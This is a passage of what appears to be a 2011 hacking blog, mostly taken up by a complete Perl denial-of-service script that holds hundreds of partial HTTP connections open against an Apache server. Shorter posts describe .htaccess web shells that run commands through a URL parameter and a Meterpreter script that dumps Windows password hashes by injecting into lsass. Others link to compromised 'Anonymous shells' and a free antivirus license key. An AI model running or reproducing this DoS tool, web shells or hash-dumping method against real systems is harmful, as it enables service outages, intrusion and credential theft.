lo0.ro cat /dev/null > stupidity – nobody is safe

23Oct/110

Apache Server 2.3.14 Denial of Service exploit

[cc lang="perl"]#!/usr/bin/perl -w
# Exploit Title: Apache Server 2.3.14 <= Denial of Service exploit (DDOS)
# Date: 22/10/2011
# Author: Xen0n
# Software Link: http://www.apache.org/dyn/closer.cgi
# Version: 2.3.14 and older
# Tested on: CentOs
#feel free to contact us xenon.sec@gmail.com
use strict;
use IO::Socket::INET;
use IO::Socket::SSL;
use Getopt::Long;
use Config;

$SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors

print < ooooooo ooooo .oooo.
`8888 d8' d8P'`Y8b
Y888..8P .ooooo. ooo. .oo. 888 888 ooo. .oo.
`8888' d88' `88b `888P"Y88b 888 888 `888P"Y88b
.8PY888. 888ooo888 888 888 888 888 888 888
d8' `888b 888 .o 888 888 `88b d88' 888 888
o888o o88888o `Y8bod8P' o888o o888o `Y8bd8P' o888o o888o

Welcome to Xen0n Apache Attacker

EOTEXT

my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
my ( $cache, $xenon, $method, $ssl, $rand, $tcpto );
my $result = GetOptions('shost=s' => \$shost,'dns=s' => \$host,'xenon' => \$xenon,'num=i' => \$connections,'cache' => \$cache,'port=i' => \$port,'https' => \$ssl,'tcpto=i' => \$tcpto,'test' => \$test,'timeout=i' => \$timeout,'version' => \$version,);

if ($version) {
print "Version 1.0\n";
exit;
}

unless ($host) {
print "Test:\n\n\tperl $0 -dns [www.example.com] -test\n";
print "Usage:\n\n\tperl $0 -dns [www.example.com] -port 80 -timeout 100 -num 1000 -tcpto 5 -xenon\n";

print "\n\temail: xenon.sec@ gmail.com\n";
print "\n";
exit;
}

unless ($port) {
$port = 80;
print "Defaulting to port 80.\n";
}

unless ($tcpto) {
$tcpto = 5;
print "Defaulting to a 5 second tcp connection timeout.\n";
}

unless ($test) {
unless ($timeout) {
$timeout = 100;
print "Defaulting to a 100 second re-try timeout.\n";
}
unless ($connections) {
$connections = 1000;
print "Defaulting to 1000 connections.\n";
}
}

my $usemultithreading = 0;
if ( $Config{usethreads} ) {
print "Multithreading enabled.\n";
$usemultithreading = 1;
use threads;
use threads::shared;
}
else {
print "No multithreading capabilites found!\n";
print "Xen0n will be slower than normal as a result.\n";
}

my $packetcount : shared = 0;
my $failed : shared = 0;
my $connectioncount : shared = 0;

srand() if ($cache);

if ($shost) {
$sendhost = $shost;
}
else {
$sendhost = $host;
}
if ($xenon) {
$method = "POST";
}
else {
$method = "GET";
}

if ($test) {
my @times = ( "1", "30", "90", "240", "500" );
my $totaltime = 0;
foreach (@times) {
$totaltime = $totaltime + $_;
}
$totaltime = $totaltime / 60;
print "Testing $host could take up to $totaltime minutes.\n";

my $delay = 0;
my $working = 0;
my $sock;

if ($ssl) {
if (
$sock = new IO::Socket::SSL(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working = 1;
}
}
else {
if (
$sock = new IO::Socket::INET(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working = 1;
}
}
if ($working) {
if ($cache) {
$rand = "?" . int( rand(99999999999999) );
}
else {
$rand = "";
}
my $primarypayload =
"GET /$rand HTTP/1.1\r\n"
. "Host: $sendhost\r\n"
. "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
. "Content-Length: 42\r\n";
if ( print $sock $primarypayload ) {
print "Connection successful, now just wait...\n";
}
else {
print
"That's odd - I connected but couldn't send the data to $host:$port.\n";
print "Is something wrong?\nDying.\n";
exit;
}
}
else {
print "Uhm... I can't connect to $host:$port.\n";
print "Is something wrong?\nDying.\n";
exit;
}
for ( my $i = 0 ; $i <= $#times ; $i++ ) {
print "Trying a $times[$i] second delay: \n";
sleep( $times[$i] );
if ( print $sock "X-a: b\r\n" ) {
print "\tWorked.\n";
$delay = $times[$i];
}
else {
if ( $SIG{__WARN__} ) {
$delay = $times[ $i - 1 ];
last;
}
print "\tFailed after $times[$i] seconds.\n";
}
}

if ( print $sock "Connection: Close\r\n\r\n" ) {
print "Okay that's enough time. Xen0n closed the socket.\n";
print "Use $delay seconds for -timeout.\n";
exit;
}
else {
print "Remote server closed socket.\n";
print "Use $delay seconds for -timeout.\n";
exit;
}
if ( $delay < 166 ) {
print < Since the timeout ended up being so small ($delay seconds) and it generally
takes between 200-500 threads for most servers and assuming any latency at
all... you might have trouble using Xen0n against this target. You can
tweak the -tcpto flag down to 1 second but it still may not build the sockets
in time.
EOSUCKS2BU
}
}
else {
print
"Attacking $host:$port every $timeout seconds with $connections sockets:\n";

if ($usemultithreading) {
domultithreading($connections);
}
else {
doconnections( $connections, $usemultithreading );
}
}

sub doconnections {
my ( $num, $usemultithreading ) = @_;
my ( @first, @sock, @working );
my $failedconnections = 0;
$working[$_] = 0 foreach ( 1 .. $num ); #initializing
$first[$_] = 0 foreach ( 1 .. $num ); #initializing
while (1) {
$failedconnections = 0;
print "\t\tBuilding sockets.\n";
foreach my $z ( 1 .. $num ) {
if ( $working[$z] == 0 ) {
if ($ssl) {
if (
$sock[$z] = new IO::Socket::SSL(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working[$z] = 1;
}
else {
$working[$z] = 0;
}
}
else {
if (
$sock[$z] = new IO::Socket::INET(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working[$z] = 1;
$packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK
}
else {
$working[$z] = 0;
}
}
if ( $working[$z] == 1 ) {
if ($cache) {
$rand = "?" . int( rand(99999999999999) );
}
else {
$rand = "";
}
my $primarypayload =
"$method /$rand HTTP/1.1\r\n"
. "Host: $sendhost\r\n"
. "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
. "Content-Length: 42\r\n";
my $handle = $sock[$z];
if ($handle) {
print $handle "$primarypayload";
if ( $SIG{__WARN__} ) {
$working[$z] = 0;
close $handle;
$failed++;
$failedconnections++;
}
else {
$packetcount++;
$working[$z] = 1;
}
}
else {
$working[$z] = 0;
$failed++;
$failedconnections++;
}
}
else {
$working[$z] = 0;
$failed++;
$failedconnections++;
}
}
}
print "\t\tSending data.\n";
foreach my $z ( 1 .. $num ) {
if ( $working[$z] == 1 ) {
if ( $sock[$z] ) {
my $handle = $sock[$z];
if ( print $handle "X-a: b\r\n" ) {
$working[$z] = 1;
$packetcount++;
}
else {
$working[$z] = 0;
#debugging info
$failed++;
$failedconnections++;
}
}
else {
$working[$z] = 0;
#debugging info
$failed++;
$failedconnections++;
}
}
}
print
"Current stats:\tXen0n has sent $packetcount packets to $host.\nThe attack will sleep for $timeout seconds...\n\n";
sleep($timeout);
}
}

sub domultithreading {
my ($num) = @_;
my @thrs;
my $i = 0;
my $connectionsperthread = 50;
while ( $i < $num ) {
$thrs[$i] =
threads->create( \&doconnections, $connectionsperthread, 1 );
$i += $connectionsperthread;
}
my @threadslist = threads->list();
while ( $#threadslist > 0 ) {
$failed = 0;
}
}

__END__[/cc]

Tagged as: , , , , , No Comments
1Jun/110

.htaccess web shells (how-to and download)

Here is an interesting approach during a pentest: .htaccess shells

Simply upload the preferred shell as a .htaccess file and then visit the .htaccess file via the url http://domain/path/.htaccess?c=command for remote code execution.

Source: here | Download all examples: here

Filed under: Uncategorized No Comments
24May/110

BitDefender Total Security 2012 – bug hunt contest

Here's how to join the bug hunt and get at those sweet, sweet prizes:

First, download the kit from here.

Second, have fun testing our product! You will probably find it useful to take a look at the testing guidelines, here.

When you come across a bug, please use http://bd2012beta.betaeasy.com/ to tell us about it. If you don't have an account yet, you will need to create one.

Make sure to be logged in when you submit bugs, so that your contribution is properly acknowledged.

The 3 most active beta testers get the grand prizes (this doesn't mean everyone else will go home empty-handed, though). All the winners will be announced on July 25th, 2011.

Terms and Conditions

Good luck and good hunting!

Oh... forgot to mention the prizes:

The prizes for our top 3 beta testers are:
1. Alienware M14x Laptop
2. Samsung Galaxy Tab
3. Google Nexus S

Source

Filed under: Uncategorized No Comments
21May/110

rips scanner static source code analyser php

RIPS is a static source code analyser for vulnerabilities in PHP webapplications. It was released during the Month of PHP Security (www.php-security.org).

Source http://sourceforge.net/projects/rips-scanner/

Download

Tagged as: , , , No Comments
19May/110

automate dumping windows hashes depending on the role and privilege level

It first checks the Privilege Level and OS.
It will check if the target is a Domain Controller.
Based on this information it will prefer the reading of the registry to get the hashes if possible, if not possible it will inject in to the lsass process if possible. For Domain Controllers it will use the injection to lsass.
If the target is a Windows 2008 server and the process is running with admin privileges it will attempt to get system privilege using getsystem, if it gets SYSTEM privilege do to the way the token privileges are set it can still not inject in to the lsass process so the code will migrate to a process already running as SYSTEM and then inject in to the lsass process.
If the code detects that it is running on a Windows 7/Vista box with UAC disabled and it is running as local admin it will run getsystem and it will use the read registry method.
On Windows 2003/2000/XP it will use getsystem and if successful it will use the read registry method.

[cc lang="bash"]meterpreter > run smart_hasdump -h
Meterpreter Script for automating the dumping of local accounts from
the SAM Database and if the targets host is a Domain Controller the
Domain Account Database using the proper technique depending on
privilage level, OS and Role of host.
OPTIONS:
-h Help menu.
-l Log folder to save results, if none provided default log path will be used.
-s Try to get SYSTEM Privilege[/cc]

Source

Script Download

Module Download

Filed under: Uncategorized No Comments
17May/110

Anonymous shells exposed

Here you can find the list:

https://sites.google.com/site/lolanonopsdead/

http://pastebin.com/6s8M4Qye backup :p

via undernews

Filed under: Uncategorized No Comments
17May/110

get a free kaspersky security suite cbe 11 license-key

Just follow the tutorial at:

http://www.pentestit.com/2011/05/17/download-free-kaspersky-security-suite-cbe-11-license-key/

Filed under: Uncategorized No Comments
   

Add to Google

Disclaimer

This website was created for educational purposes. The owner will not take any responsibility for any action you cause using the information shown in this website. Please do not contact me with blackhat type hacking requests. Thanks

Categories

Tags

backup backup exec bruteforce debian directadmin DoS download exploit hack hacking how-to install install windows 7 lfi linux pentest perl php poc python rfi scanner script scripts secure code Security security scanner share shell social engineering source code sqli SQL injection sqli scanners ssh tool tools tutorial upload shell vbulletin Web Application Scanner windows windows 7 usb wordpress xss

Meta